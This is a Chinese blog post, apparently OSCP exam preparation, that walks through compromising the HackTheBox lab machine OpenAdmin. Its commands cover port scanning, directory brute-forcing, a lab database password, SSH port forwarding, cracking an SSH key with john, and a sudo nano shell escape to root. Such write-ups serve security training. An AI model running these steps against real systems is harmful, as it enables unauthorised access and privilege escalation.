OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

Ethan医生7个月前靶场227

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.228.199 (扫描UDP)

image.png



gobuster dir -u http://10.129.228.199/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

http://10.129.228.199/ona/,在music页面上有个login点入后跳转到这个/ona

image.png

搜索看看有没有EXP

image.png

image.png

使用后直接反弹SHELL

image.png

image.png

'db_type' => 'mysqli',

        'db_host' => 'localhost',

        'db_login' => 'ona_sys',

        'db_passwd' => 'n1nj4W4rri0R!',

        'db_database' => 'ona_default',

        'db_debug' => false,


读取到数据配置信息,获得了数据库的账号和密码,因为上面我们收集信息发现一个目录/var/www/有个internal的权限只能是jimmy才能查看到的,所以猜测上面数据库的密码信息是否也跟此用户一样,测试登录一吧,成功登录后查看目录/var/www/internal下面的index.php发现有硬编码加密的密码hash值

image.png

直接去internal下看index.php里

image.png

出现密码必须=sha512

image.png

得到账号和密码之后要通过web访问,但是我查看到internel对应目录及业务在本地监听一个高端口,外面访问不了,所以需要使用ssh进行端口转发,可以使用本地端口转发,也可以使用远程端口转发都可以,相关操作如下:


 cat /etc/apache2/sites-enabled/internal.conf

image.png

ssh -L 2223:127.0.0.1:52846 jimmy@10.129.228.199 -N

image.png

image.png

ssh2john pa > pa.hash 

john pa.hash --wordlist=/usr/share/wordlists/rockyou.txt 

image.png

image.png

sudo -l

image.png

sudo /bin/nano /opt/priv

https://gtfobins.github.io/,

sudo nano
^R^X
reset; sh 1>&0 2>&0

image.png

标签: OSCP

相关文章

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)查看到版本是2.3,有rcepython3 49125.p...

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。